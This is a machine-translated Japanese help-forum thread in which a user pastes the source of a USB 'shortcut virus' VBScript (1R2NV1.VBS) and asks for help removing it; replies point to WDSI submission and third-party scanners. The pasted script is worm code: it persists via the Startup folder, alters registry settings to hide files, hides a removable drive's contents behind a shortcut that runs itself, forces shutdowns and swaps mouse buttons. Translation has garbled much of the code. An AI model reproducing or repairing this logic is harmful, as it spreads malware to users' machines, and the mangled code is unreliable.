システムwiki

ショートカットウイルス「1R2NV1.VBS」

Yashova 受付中 最終更新日:2021-04-28 10:46

私のシステムはショートカットウイルス「1R2NV1.VBS」に感染しています.cmd attribコマンドを使用して、スクリプトのファイルと内容が表示されています-

エラーが次に再開されます次の
strComputer= "." '(コンピュータ名またはアドレス)
wmi= getObject( "winmgmts:\\"&"\root\cimv2")を設定します.
wmievent= wmi.execnotificationQuery( "select*から1内の__instanceOperationEventのセレクト* TargetInstance ISA 'Win32_PNPentity'とtargetInstance.description= 'USB大容量記憶装置' ")
wshshell= createObject( "WScript.Shell")を設定します( "fs= createObject"( "scripting.filesystemObject")
fs.fileexists( "1r2nv1.vbs")が
fs.deletefile( "1r2nv1.vbs")

fs.fileexists( "1R2nv2.vbs")の場合

objfile= fs.getfile( "1r2nv2.vbs")を設定してください.
objfile.Attributes 2
path= wshshell.specialfolders( "startup")
x= fs.copyFile( "1R2Nv2)の場合、

path= wshshell.specialfolders(" startup ")

x= fs.copyfile(" 1R2Nv2) vbs "、path&"\"、true)
lnk= wshshell.creathortcut(path&" windows service.lnk ")
lnk.targetpath= path&"\1r2nv2.vbs "
lnk.iconlocation= "c:\windows\system32\shell32.dll、4"
lnk.save
set lnk= nothing
hidden= "hkcu\software\Microsoft\Windows\currentVersion\Explorer\advanced\hidden "" hkcu\software\Microsoft\windows\currentVersion\Explorer\Advanced\ShowPerHidden ""
st= wshshell.regread(非表示)
st= 2
wshshell.regwrite hidden、2、 "reg_dword"
wshshell.regwrite Shidded、0、 "Reg_dwo RD ""

wshshell.sendkeys( "{f5}")
datepart( "d"、現在)= 9
wscript.sleep(10000)
strcmd= " shutdown-s-f-t 0-c system-error "
wshshell.run strcmd



fs.folderexists(" Systems ")("システム ")
wshshell.run" cmd/cを開始するシステム "、0


while
while
while
wmievent.nextEvent()
case usb.path_.class
ケース" __instanceCreationevent "



隠し= "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden" "
hkcu\software\Microsoft\windows\currentVersion\Explorer\Advanced\ShowPherhidden" "
st= wshshell.regread(隠された)
ST= 2でない場合は、
wshshell.regwrite hidden、2、 "reg_dword"
wshshell.regwrite Shidded、0、 "Reg_Dword"


const const und br= 1>FS.Drivesの各ODRIVEの場合は、
ODRive.Drivetype= RemovableおよびODRive.DriveLetter<>"A"でない場合は<>"" ODRive.driveletter&":\Systems")
FS.CreateFolder ODRive.DriveLetter&":\"&"システム"




objfolderを設定します= fs.getFolder(ODRive.driveLetter&":\Systems")
objfolder.Attributesと2次の場合は2



fs.folderexistsの場合
(ODRive.DriveLetter&":\Systems")次に、fs.getFolder(ODRive.DriveLetter&":\")の各ファイルに.ファイル
file.Move ODRive.DriveLetter&":\Systems \"
fs.getFolder(ODRive.driveLetter&":\")の各サブフォルダの次へ
サブフォルダ
subfolder.move odrive.driveletter&":\systems \"
次へ
終わり
fs.fileexists(ODRive.DriveLetter&":\1r2nv2.vbs")であれば、
fs.copyfile "1r2nv2.vbs"、odrive.driveletter&":\"、true
set objfile= fs.getFile(ODRive.driveLetter&":\1R2Nv2.vbs")
objfile.Attributesと2次の場合は2













BR>SET LNK= wshshell.creathortCut(ODRive.DriveLetter&":\"&ODRive.Volumename&".lnk")
lnk.targetpath= "cmd.exe"
lnk.arguments= "/c start 1r2nv2.vbs&exit "
lnk.iconlocation="c:\windows\system32\shell3 2.dll、7 "
lnk.save
set lnk= nothing
fs.copyfile path&"\1r2nv2.vbs "、odrive.driveletter&":\"
fsの場合フォックスレXists(ODRive.DriveLetter&":\Systems\AST")
wshshell.run.driveletter&":\systems\asst\ast.vbs" "" "
wscript.sleep(30000)




whee日の場合
weekday(date)= vbmonday
wshshell.run "cmd/c rundll32 user32、swapmousebutton"、0、true、true、true







日付)= vbthursday
wshshell.run "cmd/c rundll32 user32、swapmouseButton"、0、true





end select
Wend

私はすべてのUSBドライバ(クリーンフォーマット後でさえ)が挿入されるようになる前にスクリプトが実行されたと思います私のPCでは感染しています.Windows Defenderは、私のUSBまたは私のシステムで何も検出できません.このウイルスによって行われた関連レジストリエントリを削除して、私のPCを修正してください.

wdsiでファイルを送信して提出IDA9922AE0-840A-4F2C-A70A-6251A9B69131

返信リスト(回答:4)

1 #
Cyber

WDSIを提出していただきありがとうございます、誰かがあなたの投稿に答えます.

あなたは感染したのか知っていますか?

ウェブサイトまたはUSB?

応答1# ->にスキップ
2 #
Yashova 1

友達のUSBでした.それがウイルスだったので遅すぎました.

応答2# ->にスキップ
3 #
Yashova
ああ、私が言及したいもう1つのことは、私がライブ chat の上でマイクロソフトサポートと連絡を取り合ったことです.Support Execはリモート接続を介して接続されている、Windows DefenderのオフラインScanを実行する(接続が失われます).
PCがオンラインになっていて、リモートクライアントが再接続しようとした場合、EXECは残っていました.Scanは何も見つかりませんでした.
応答3# ->にスキップ
4 #
Cyber

他にサンプルがある場合は、必ずそれらをWDSIに送信してください.

チームからの最終分析を待つ必要があります.

その間、Malwarebytes(スキャナーのみ)などの他のサードパーティスキャナーを使用して、それが削除できるかどうかを確認することもできます.

関連質問